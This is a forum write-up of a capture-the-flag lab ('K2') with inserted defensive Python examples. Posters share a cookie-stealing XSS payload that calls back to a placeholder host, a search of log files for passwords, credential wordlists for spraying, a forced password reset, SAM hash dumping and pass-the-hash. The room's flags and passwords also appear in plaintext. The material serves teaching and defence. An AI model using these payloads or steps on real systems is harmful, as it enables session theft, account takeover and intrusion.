K2 Discussion [WRITE-UP]

Yes it is! You can connect to James using password found :smiley:

$ ssh [email protected]                                                                                                                   
[email protected]'s password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-150-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 28 Sep 2024 01:12:31 PM UTC

  System load:  0.17              Processes:             136
  Usage of /:   74.1% of 8.87GB   Users logged in:       0
  Memory usage: 18%               IPv4 address for eth0: 10.10.66.45
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

22 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Sep 28 13:11:55 2024 from 10.9.3.170
james@k2:~$ 

1 Like

I’ll drop the answers & flag later on.

The server has 2 users, james and rose; we need to get to rose as she’s a member of the group sudo.

james@k2:/home/rose/k2_site/static$ id rose
uid=1001(rose) gid=1001(rose) groups=1001(rose),27(sudo)
james@k2:/home/rose/k2_site/static$ 

Good!! “I’m confused about how to obtain the token and session on admin.k2.”

Make a Python web server using this:

$ python3 -m http.server

Then make an account on it.k2.thm and send this payload as the message description. Don’t forget to change your IP and PORT.

<script>var+doc+%3d+window['document']%3bvar+cookie+%3d+doc['co'+%2b+'okie']%3bfetch('http%3a//YOUR_IP%3aYOUR_PORT%3fcookie%3d'+%2b+cookie)%3b</script>

Wait for a bit and you’ll see cookie=session=[Token]. Copy the token and head to admin.k2.thm, inspect > storage, and then add a session cookie with a value of the token that you got.

Once done, don’t do anything else other than going to http://admin.k2.thm/dashboard and you’ll be in!

Root path:

As james, running id will show our current groups, one of them is adm.

james@k2:/$ id
uid=1002(james) gid=1002(james) groups=1002(james),4(adm)
james@k2:/$

Usually members of the group adm have permissions to read log files located inside /var/log/ - Hacktricks

Grepping on “rose” in /var/log will get us root’s password.

james@k2:/$ grep -iR rose /var/log 2>/dev/null

Once you’re root you just need to read /home/rose/.bash_history for her password.

For those interested in points: even though I highly advise doing the room for learning purposes, the steps are clear and understandable.

  • User Flag: THM{9e04a7419a2b7a86163496271a8a95dd}
  • Root Flag: THM{c6f684e3b1089cd75f205f93de9fe93d}
  • Usernames and Passwords: james:Pwd@9tLNrC3!,root:RdzQ7MSKt)fNaz3!,rose:vRMkaVgdfxhW!8
  • Full Names: James Bold, Rose Bud

james user flag:

THM{9e04a7419a2b7a86163496271a8a95dd}

1 Like
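The cookie theft in the post works because the session cookie can be read from document.cookie and the message description is rendered as raw HTML. The following is an added example (not code from the post or from the room) showing the two server-side fixes a defender would apply, plus a small audit helper for checking a Set-Cookie header. The description string and the token are constructed placeholders:

```python
import html
from http.cookies import SimpleCookie

# Constructed sample: a message description carrying a cookie-stealing script,
# the same shape as the payload quoted in the post above (the host is a placeholder).
MALICIOUS_DESCRIPTION = (
    "<script>fetch('http://ATTACKER_HOST:8000/?cookie=' + document.cookie)</script>"
)


def render_description(raw: str) -> str:
    """Return the HTML fragment the dashboard would embed for a message.

    html.escape converts < > & " ' to entities, so a browser displays the
    description as text instead of executing it (output encoding stops stored XSS).
    """
    return '<p class="description">' + html.escape(raw, quote=True) + "</p>"


def session_cookie_header(token: str, secure: bool = True) -> str:
    """Build the Set-Cookie header value for a session token.

    HttpOnly keeps the value out of document.cookie, so even a script that does
    run cannot read it; SameSite=Lax limits cross-site sending; Secure keeps it
    off plaintext HTTP.
    """
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    if secure:
        cookie["session"]["secure"] = True
    return cookie["session"].OutputString()


def audit_set_cookie(header: str) -> dict:
    """Report which protective attributes a Set-Cookie header value carries.

    Useful when reviewing an application's responses: a session cookie without
    HttpOnly is exactly what makes the exfiltration in the post possible.
    """
    attrs = [part.strip().lower() for part in header.split(";")[1:]]
    samesite = next((a.split("=", 1)[1] for a in attrs if a.startswith("samesite=")), None)
    return {
        "httponly": "httponly" in attrs,
        "secure": "secure" in attrs,
        "samesite": samesite,
    }


if __name__ == "__main__":
    print(render_description(MALICIOUS_DESCRIPTION))
    hardened = session_cookie_header("EXAMPLE_TOKEN")
    print(hardened, audit_set_cookie(hardened))
    print(audit_set_cookie("session=EXAMPLE_TOKEN; Path=/"))
```

Output encoding removes the injection itself; HttpOnly limits the damage if some other injection slips through. Both are needed, because HttpOnly does nothing against a script that simply performs actions in the victim's session rather than reading the cookie.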
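The root path relies on a password having been written into a file under /var/log that every adm member can read. From the defender's side the fix is to keep credentials out of logs in the first place, and a periodic scan catches the ones that slip in. This is an added example, not code from the post: a small scanner over constructed log lines (the hosts, users and secrets below are placeholders) that reports each leaked value with the secret masked.

```python
import re
from typing import Dict, List

# Constructed sample log lines (not from the box); every secret here is a placeholder.
SAMPLE_LOG = """\
Sep 28 12:58:01 host sudo:     rose : TTY=pts/0 ; PWD=/home/rose ; USER=root ; COMMAND=/usr/sbin/useradd -m -p FakePass!123 james
Sep 28 12:58:20 host app[1234]: login ok user=rose
Sep 28 12:59:02 host app[1234]: db connect mysql://rose:S3cretExample@127.0.0.1/k2
Sep 28 12:59:40 host cron[77]: (root) CMD (backup --password=ExampleOnly42 /srv)
Sep 28 13:00:00 host sshd[90]: Accepted publickey for james from 10.0.0.5 port 4444 ssh2
"""

# Shapes in which credentials commonly end up in logs: a password passed on a
# command line, user:password in a connection URL, and key=value style fields.
PATTERNS = [
    ("cli_password_flag", re.compile(r"(?:--password|-p)[= ]([^\s]+)")),
    ("url_userinfo", re.compile(r"[a-z][a-z0-9+.-]*://[^:/\s]+:([^@\s]+)@")),
    ("key_value", re.compile(r"\b(?:passwd|password|secret|token)\s*[:=]\s*([^\s,;]+)", re.I)),
]


def mask(secret: str) -> str:
    """Keep two leading characters so a reviewer can recognise the value family."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per distinct secret per line, with the value masked."""
    findings: List[Dict[str, object]] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        seen = set()
        for rule, pattern in PATTERNS:
            for match in pattern.finditer(line):
                secret = match.group(1)
                if secret in seen:
                    continue  # two rules hit the same value (e.g. --password=...)
                seen.add(secret)
                findings.append({
                    "line": line_no,
                    "rule": rule,
                    "masked": mask(secret),
                    "redacted_line": line.replace(secret, mask(secret)),
                })
    return findings


def leaked_lines(text: str) -> List[int]:
    """Line numbers that carry at least one credential, for a quick summary."""
    return sorted({int(f["line"]) for f in scan_log(text)})


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']:>3}  {finding['rule']:<18}  {finding['redacted_line']}")
    print("lines with leaked credentials:", leaked_lines(SAMPLE_LOG))
```

Run it against real files under /var/log as a cron job or a CI step over application logs; anything it reports should be rotated, and the logging call that produced it fixed. The patterns are deliberately narrow to keep false positives low, which means they miss secrets in unusual shapes; widen them per application.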

I thought it was rose’s password, my bad, it’s root’s password actually lol :thinking::smiling_face_with_tear:

Haha that’s what I thought too at first but it did work for root. For rose’s password it was quite easy to tell where it was since the .bash_history wasn’t pointed to /dev/null.

Machine 2 - Middle Camp

User Flag

So the initial foothold should be finding an existing user and the corresponding password as the Guest account is deactivated. The task 2 description contains:

Use all of the information gathered from your previous findings in order to keep making your way to the top.

We just need to make a wordlist of users & passwords found on the first box, use nxc, and you’ll find a valid set of credentials.

USERS:

james
rose
bob
steve
cait
xu
ash
James.Bold
Rose.Bud
j.bold
j.smith
r.bud
james.b
rose.b

Passwords:

Pwd@9tLNrC3!
VrMAogdfxW!9
PasSW0Rd321
St3veRoxx32
PartyAlLDaY!32
L0v3MyDog!3!
PikAchu!IshoesU!
vRMkaVgdfxhW!8
RdzQ7MSKt)fNaz3!

Once you find the valid credentials you’ll find notes.txt and note_to_james.txt

*Evil-WinRM* PS C:\Users\r.bud\Documents> type notes.txt
Done:
1. Note was sent and James has already performed the required action. They have informed me that they kept the base password the same, they just added two more characters to meet the criteria. It is easier for James to remember it that way.

2. James's password meets the criteria.

Pending:
1. Give James Remote Access.
*Evil-WinRM* PS C:\Users\r.bud\Documents> type note_to_james.txt
Hello James:

Your password "rockyou" was found to only contain alphabetical characters. I have removed your Remote Access for now.

At the very least adhere to the new password policy:
1. Length of password must be in between 6-12 characters
2. Must include at least 1 special character
3. Must include at least 1 number between the range of 0-999
*Evil-WinRM* PS C:\Users\r.bud\Documents>

You need to craft a custom wordlist to generate a list of passwords based on the password policy and what has been said in notes.txt.

Once you find the password, use BloodHound and retrieve james’s groups & permissions.

Run the following command on your machine:

net rpc password "j.smith" 'P1ssword!' -U 'k2.thm/j.bold%#8rockyou' -S "Machine_IP"

and j.smith’s password gets changed; connect as that user using Evil-WinRM and you’ll get the user.txt.

Root Hash & Flag

Once you’re on j.smith you can check permissions using whoami /priv and you’ll see SeBackupPrivilege; use that to download HKLM\SYSTEM and HKLM\SAM to your machine and use secretsdump to retrieve the Admin hash, which you can submit!

$ python3 secretsdump.py -sam SAM -system SYSTEM LOCAL

Once you have the hash, you can perform a pass-the-hash using evil-winrm, connect to administrator and retrieve root flag!

1 Like
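The two notes above describe a password policy and, in the same breath, the habit that defeats it: keeping the old base word and appending two characters. As an added example (not code from the post or from the room), here is a validator a defender would put behind such a policy. It implements the three rules from note_to_james.txt and adds the banned-base check that the policy is missing. The banned list is constructed for the example, and reading "a number between 0-999" as a run of one to three digits is my interpretation of the rule:

```python
import re
from typing import List

# Constructed banned-base list; a real deployment would use a breached-password list.
BANNED_BASES = {"rockyou", "password", "welcome", "letmein"}

SPECIAL_CHAR = re.compile(r"[^A-Za-z0-9]")
# Assumption: "a number between 0-999" means a run of one to three digits
# that is not part of a longer digit sequence.
NUMBER_0_999 = re.compile(r"(?<!\d)\d{1,3}(?!\d)")


def policy_violations(password: str) -> List[str]:
    """Return the rules from note_to_james.txt that the password fails."""
    problems = []
    if not 6 <= len(password) <= 12:
        problems.append("length must be between 6 and 12 characters")
    if not SPECIAL_CHAR.search(password):
        problems.append("must include at least one special character")
    if not NUMBER_0_999.search(password):
        problems.append("must include a number between 0 and 999")
    return problems


def built_on_banned_base(password: str, max_extra: int = 2) -> bool:
    """True if the password is a banned word plus at most `max_extra` other characters.

    This is the weakness notes.txt describes: keeping the old base word and
    appending a couple of characters satisfies the letter of the policy only.
    """
    lowered = password.lower()
    return any(
        base in lowered and len(lowered) - len(base) <= max_extra
        for base in BANNED_BASES
    )


def is_acceptable(password: str) -> bool:
    """Policy check plus the banned-base check a sensible policy would add."""
    return not policy_violations(password) and not built_on_banned_base(password)


if __name__ == "__main__":
    for candidate in ["rockyou", "rockyou!7", "Winter2024!!", "Tr1ck&Mule"]:
        print(f"{candidate!r}: violations={policy_violations(candidate)} "
              f"banned_base={built_on_banned_base(candidate)} "
              f"acceptable={is_acceptable(candidate)}")
```

The point of the banned-base check is that composition rules alone do not stop a user from turning a rejected password into an accepted one with a trivial edit; screening against a breached-password list (with a small tolerance for appended characters) is what current guidance recommends instead of ever-longer rule lists.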